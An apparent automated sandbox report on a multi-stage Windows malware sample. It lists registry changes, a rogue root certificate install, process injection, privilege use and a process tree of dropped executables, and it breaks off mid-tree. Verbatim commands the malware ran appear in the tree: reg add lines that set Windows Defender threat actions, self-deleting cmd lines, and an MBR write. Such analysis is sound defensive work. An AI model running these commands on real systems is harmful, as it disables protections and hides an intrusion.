Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DDD4B5D4-FD54-497C-8789-0830F29A60EE}\NumMethods\ = "10"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7B3B7A69-7D88-4847-A6BC-90E246A41F69}\ProxyStubClsid32\ = "{2B1EC306-3EDE-4012-9BB0-FB836132FF52}"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\NumMethods\ = "10"	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D9AA3288-4EA7-4E67-AE60-D18EADCB923D}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8F09CD6C-5964-4573-82E3-EBFF7702865B}	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{7584D24A-E056-4EB1-8E7B-632F2B0ADC69}\ = "IPolicyStatusValue"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{E4518371-7326-4865-87F8-D9D3F3B287A3}\NumMethods\ = "4"	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachine\CLSID\ = "{D1E8B1A6-32CE-443C-8E2E-EBA90C481353}"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{492E1C30-A1A2-4695-87C8-7A8CAD6F936F}\VersionIndependentProgID\ = "MicrosoftEdgeUpdate.Update3WebMachine"	MicrosoftEdgeUpdate.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A2F5CB38-265F-4A02-9D1E-F25B664968AB}	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\VersionIndependentProgID	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{E421557C-0628-43FB-BF2B-7C9F8A4D067C}	MicrosoftEdgeUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E8F1B36-249F-4FC3-9994-974AFAA07B26}\InprocServer32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{450CF5FF-95C4-4679-BECA-22680389ECB9}\ProxyStubClsid32	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{60355531-5BFD-45AB-942C-7912628752C7}\NumMethods	MicrosoftEdgeUpdateComRegisterShell64.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1B9063E4-3882-485E-8797-F28A0240782F}	MicrosoftEdgeUpdateComRegisterShell64.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{2E1DD7EF-C12D-4F8E-8AD8-CF8CC265BAD0}\LocalizedString = "@C:\\Program Files (x86)\\Microsoft\\EdgeUpdate\\1.3.187.39\\msedgeupdate.dll,-3000"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\MicrosoftEdgeUpdate.OnDemandCOMClassMachineFallback\CLSID\ = "{FF419FF9-90BE-4D9F-B410-A789F90E5A7C}"	MicrosoftEdgeUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{99F8E195-1042-4F89-A28C-89CDB74A14AE}\ProxyStubClsid32\ = "{2B1EC306-3EDE-4012-9BB0-FB836132FF52}"	MicrosoftEdgeUpdateComRegisterShell64.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61	fileosn.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064	fileosn.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2816	34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe
2816	34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe
4236	explortu.exe
4236	explortu.exe
4776	869ad9587e.exe
4776	869ad9587e.exe
1732	axplont.exe
1732	axplont.exe
5016	2bf30d8f13.exe
5016	2bf30d8f13.exe
2860	RegAsm.exe
2860	RegAsm.exe
1660	svhoost.exe
1660	svhoost.exe
1660	svhoost.exe
1660	svhoost.exe
220	axplont.exe
220	axplont.exe
4564	explortu.exe
4564	explortu.exe
3492	One.exe
3492	One.exe
4080	gvCB6r8URq2nYNOzoN8DUIuw.exe
4080	gvCB6r8URq2nYNOzoN8DUIuw.exe
4080	gvCB6r8URq2nYNOzoN8DUIuw.exe
4080	gvCB6r8URq2nYNOzoN8DUIuw.exe
2600	fileosn.exe
2600	fileosn.exe
2600	fileosn.exe
2600	fileosn.exe
2600	fileosn.exe
2600	fileosn.exe
5832	MicrosoftEdgeUpdate.exe
5832	MicrosoftEdgeUpdate.exe
5852	hC0GJcs7DpneAK2PnSD0aFRV.exe
5852	hC0GJcs7DpneAK2PnSD0aFRV.exe
5852	hC0GJcs7DpneAK2PnSD0aFRV.exe
1660	svhoost.exe
1660	svhoost.exe
5852	hC0GJcs7DpneAK2PnSD0aFRV.exe
5852	hC0GJcs7DpneAK2PnSD0aFRV.exe
5072	powershell.exe
5072	powershell.exe
5072	powershell.exe
3492	powershell.exe
3492	powershell.exe
3492	powershell.exe
4120	powershell.exe
4120	powershell.exe
4120	powershell.exe
3768	powershell.exe
3768	powershell.exe
3768	powershell.exe
3964	powershell.exe
3964	powershell.exe
3964	powershell.exe
2632	powershell.EXE
2632	powershell.EXE
2632	powershell.EXE
4796	explortu.exe
4796	explortu.exe
5668	axplont.exe
5668	axplont.exe
220	AddInProcess32.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3492	One.exe
Token: SeBackupPrivilege	3492	One.exe
Token: SeSecurityPrivilege	3492	One.exe
Token: SeSecurityPrivilege	3492	One.exe
Token: SeSecurityPrivilege	3492	One.exe
Token: SeSecurityPrivilege	3492	One.exe
Token: SeDebugPrivilege	3136	file300un.exe
Token: SeDebugPrivilege	5448	regsvcs.exe
Token: SeManageVolumePrivilege	4080	gvCB6r8URq2nYNOzoN8DUIuw.exe
Token: SeDebugPrivilege	5852	hC0GJcs7DpneAK2PnSD0aFRV.exe
Token: SeDebugPrivilege	2600	fileosn.exe
Token: SeDebugPrivilege	5832	MicrosoftEdgeUpdate.exe
Token: SeDebugPrivilege	1660	svhoost.exe
Token: SeDebugPrivilege	2580	RegAsm.exe
Token: SeDebugPrivilege	5072	powershell.exe
Token: SeDebugPrivilege	3492	powershell.exe
Token: SeIncreaseQuotaPrivilege	3812	WMIC.exe
Token: SeSecurityPrivilege	3812	WMIC.exe
Token: SeTakeOwnershipPrivilege	3812	WMIC.exe
Token: SeLoadDriverPrivilege	3812	WMIC.exe
Token: SeSystemProfilePrivilege	3812	WMIC.exe
Token: SeSystemtimePrivilege	3812	WMIC.exe
Token: SeProfSingleProcessPrivilege	3812	WMIC.exe
Token: SeIncBasePriorityPrivilege	3812	WMIC.exe
Token: SeCreatePagefilePrivilege	3812	WMIC.exe
Token: SeBackupPrivilege	3812	WMIC.exe
Token: SeRestorePrivilege	3812	WMIC.exe
Token: SeShutdownPrivilege	3812	WMIC.exe
Token: SeDebugPrivilege	3812	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3812	WMIC.exe
Token: SeRemoteShutdownPrivilege	3812	WMIC.exe
Token: SeUndockPrivilege	3812	WMIC.exe
Token: SeManageVolumePrivilege	3812	WMIC.exe
Token: 33	3812	WMIC.exe
Token: 34	3812	WMIC.exe
Token: 35	3812	WMIC.exe
Token: 36	3812	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3812	WMIC.exe
Token: SeSecurityPrivilege	3812	WMIC.exe
Token: SeTakeOwnershipPrivilege	3812	WMIC.exe
Token: SeLoadDriverPrivilege	3812	WMIC.exe
Token: SeSystemProfilePrivilege	3812	WMIC.exe
Token: SeSystemtimePrivilege	3812	WMIC.exe
Token: SeProfSingleProcessPrivilege	3812	WMIC.exe
Token: SeIncBasePriorityPrivilege	3812	WMIC.exe
Token: SeCreatePagefilePrivilege	3812	WMIC.exe
Token: SeBackupPrivilege	3812	WMIC.exe
Token: SeRestorePrivilege	3812	WMIC.exe
Token: SeShutdownPrivilege	3812	WMIC.exe
Token: SeDebugPrivilege	3812	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3812	WMIC.exe
Token: SeRemoteShutdownPrivilege	3812	WMIC.exe
Token: SeUndockPrivilege	3812	WMIC.exe
Token: SeManageVolumePrivilege	3812	WMIC.exe
Token: 33	3812	WMIC.exe
Token: 34	3812	WMIC.exe
Token: 35	3812	WMIC.exe
Token: 36	3812	WMIC.exe
Token: SeDebugPrivilege	4120	powershell.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeDebugPrivilege	3964	powershell.exe
Token: SeDebugPrivilege	2632	powershell.EXE
Token: SeDebugPrivilege	220	AddInProcess32.exe
Token: SeDebugPrivilege	4908	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
5948	EfSkjSIaEOZwTlKna4brVkvJ.exe

Suspicious use of SendNotifyMessage 1 IoCs

pid	Process
5948	EfSkjSIaEOZwTlKna4brVkvJ.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2816 wrote to memory of 4236	2816	34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe	89
PID 2816 wrote to memory of 4236	2816	34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe	89
PID 2816 wrote to memory of 4236	2816	34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe	89
PID 4236 wrote to memory of 4756	4236	explortu.exe	100
PID 4236 wrote to memory of 4756	4236	explortu.exe	100
PID 4236 wrote to memory of 4756	4236	explortu.exe	100
PID 4236 wrote to memory of 4776	4236	explortu.exe	102
PID 4236 wrote to memory of 4776	4236	explortu.exe	102
PID 4236 wrote to memory of 4776	4236	explortu.exe	102
PID 4776 wrote to memory of 1732	4776	869ad9587e.exe	105
PID 4776 wrote to memory of 1732	4776	869ad9587e.exe	105
PID 4776 wrote to memory of 1732	4776	869ad9587e.exe	105
PID 4236 wrote to memory of 5016	4236	explortu.exe	106
PID 4236 wrote to memory of 5016	4236	explortu.exe	106
PID 4236 wrote to memory of 5016	4236	explortu.exe	106
PID 1732 wrote to memory of 224	1732	axplont.exe	107
PID 1732 wrote to memory of 224	1732	axplont.exe	107
PID 1732 wrote to memory of 224	1732	axplont.exe	107
PID 224 wrote to memory of 2580	224	33333.exe	108
PID 224 wrote to memory of 2580	224	33333.exe	108
PID 224 wrote to memory of 2580	224	33333.exe	108
PID 224 wrote to memory of 2580	224	33333.exe	108
PID 224 wrote to memory of 2580	224	33333.exe	108
PID 224 wrote to memory of 2580	224	33333.exe	108
PID 224 wrote to memory of 2580	224	33333.exe	108
PID 224 wrote to memory of 2580	224	33333.exe	108
PID 1732 wrote to memory of 2600	1732	axplont.exe	109
PID 1732 wrote to memory of 2600	1732	axplont.exe	109
PID 1732 wrote to memory of 2600	1732	axplont.exe	109
PID 2580 wrote to memory of 1660	2580	RegAsm.exe	110
PID 2580 wrote to memory of 1660	2580	RegAsm.exe	110
PID 2580 wrote to memory of 1660	2580	RegAsm.exe	110
PID 2580 wrote to memory of 3492	2580	RegAsm.exe	111
PID 2580 wrote to memory of 3492	2580	RegAsm.exe	111
PID 1732 wrote to memory of 540	1732	axplont.exe	113
PID 1732 wrote to memory of 540	1732	axplont.exe	113
PID 1732 wrote to memory of 540	1732	axplont.exe	113
PID 540 wrote to memory of 4648	540	lumma1234.exe	116
PID 540 wrote to memory of 4648	540	lumma1234.exe	116
PID 540 wrote to memory of 4648	540	lumma1234.exe	116
PID 540 wrote to memory of 5108	540	lumma1234.exe	117
PID 540 wrote to memory of 5108	540	lumma1234.exe	117
PID 540 wrote to memory of 5108	540	lumma1234.exe	117
PID 540 wrote to memory of 5108	540	lumma1234.exe	117
PID 540 wrote to memory of 5108	540	lumma1234.exe	117
PID 540 wrote to memory of 5108	540	lumma1234.exe	117
PID 540 wrote to memory of 5108	540	lumma1234.exe	117
PID 540 wrote to memory of 5108	540	lumma1234.exe	117
PID 540 wrote to memory of 5108	540	lumma1234.exe	117
PID 1732 wrote to memory of 880	1732	axplont.exe	118
PID 1732 wrote to memory of 880	1732	axplont.exe	118
PID 1732 wrote to memory of 880	1732	axplont.exe	118
PID 880 wrote to memory of 4620	880	gold.exe	120
PID 880 wrote to memory of 4620	880	gold.exe	120
PID 880 wrote to memory of 4620	880	gold.exe	120
PID 880 wrote to memory of 4620	880	gold.exe	120
PID 880 wrote to memory of 4620	880	gold.exe	120
PID 880 wrote to memory of 4620	880	gold.exe	120
PID 880 wrote to memory of 4620	880	gold.exe	120
PID 880 wrote to memory of 4620	880	gold.exe	120
PID 880 wrote to memory of 4620	880	gold.exe	120
PID 1732 wrote to memory of 4532	1732	axplont.exe	123
PID 1732 wrote to memory of 4532	1732	axplont.exe	123
PID 1732 wrote to memory of 4532	1732	axplont.exe	123

C:\Users\Admin\AppData\Local\Temp\34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe
"C:\Users\Admin\AppData\Local\Temp\34301350bdf40a7bce830286b61489bd0eab21ed770ed668d5ef739726acf6eb.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2816
- C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
  "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4236
- - C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
    "C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
    3⤵
    PID:4756
- - C:\Users\Admin\1000004002\869ad9587e.exe
    "C:\Users\Admin\1000004002\869ad9587e.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4776
  - - C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe
      "C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:1732
    - - C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:224
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Checks computer location settings
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2580
        
        C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1660
        
        C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
        
        "C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3492
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
        7⤵
        
        PID:5444
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /C Y /N /D Y /T 3
        8⤵
        
        PID:5344
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 224 -s 284
        6⤵
        Program crash
        
        PID:5104
    - - C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe"
        5⤵
        Executes dropped EXE
        Modifies system certificate store
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2600
    - - C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:540
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4648
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:5108
    - - C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:880
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4620
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 260
        6⤵
        Program crash
        
        PID:3276
    - - C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4532
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:2064
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:4024
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        
        PID:2924
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        6⤵
        Checks computer location settings
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:2860
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" & del "C:\ProgramData\*.dll"" & exit
        7⤵
        
        PID:976
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 5
        8⤵
        Delays execution with timeout.exe
        
        PID:2924
    - - C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe
        
        "C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:3136
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5448
        
        C:\Users\Admin\Pictures\gvCB6r8URq2nYNOzoN8DUIuw.exe
        
        "C:\Users\Admin\Pictures\gvCB6r8URq2nYNOzoN8DUIuw.exe" /s
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Writes to the Master Boot Record (MBR)
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4080
        
        C:\Users\Admin\Pictures\hC0GJcs7DpneAK2PnSD0aFRV.exe
        
        "C:\Users\Admin\Pictures\hC0GJcs7DpneAK2PnSD0aFRV.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:5852
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        8⤵
        
        PID:5636
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        8⤵
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:220
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        9⤵
        
        PID:2952
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
        9⤵
        
        PID:1588
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
        8⤵
        Checks SCSI registry key(s)
        
        PID:5676
        
        C:\Users\Admin\Pictures\EfSkjSIaEOZwTlKna4brVkvJ.exe
        
        "C:\Users\Admin\Pictures\EfSkjSIaEOZwTlKna4brVkvJ.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:5948
        
        C:\Users\Admin\Pictures\C8VQANJgr5qxpu6q8o1ZlQUE.exe
        
        "C:\Users\Admin\Pictures\C8VQANJgr5qxpu6q8o1ZlQUE.exe"
        7⤵
        Modifies firewall policy service
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:5480
        
        C:\Users\Admin\Pictures\LVZUWIeVyGecZ86mtEnuszPl.exe
        
        "C:\Users\Admin\Pictures\LVZUWIeVyGecZ86mtEnuszPl.exe"
        7⤵
        Executes dropped EXE
        
        PID:3260
        
        C:\Users\Admin\AppData\Local\Temp\7zS5148.tmp\Install.exe
        
        .\Install.exe
        8⤵
        Executes dropped EXE
        
        PID:3500
        
        C:\Users\Admin\AppData\Local\Temp\7zS54D2.tmp\Install.exe
        
        .\Install.exe /NQHxdidUQs "385118" /S
        9⤵
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Enumerates system info in registry
        
        PID:4640
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        10⤵
        
        PID:5180
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        11⤵
        
        PID:4424
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        12⤵
        
        PID:5676
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        13⤵
        
        PID:4136
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        11⤵
        
        PID:4124
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        12⤵
        
        PID:5896
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        13⤵
        
        PID:3784
        
        C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        11⤵
        
        PID:4972
        
        C:\Windows\SysWOW64\cmd.exe
        
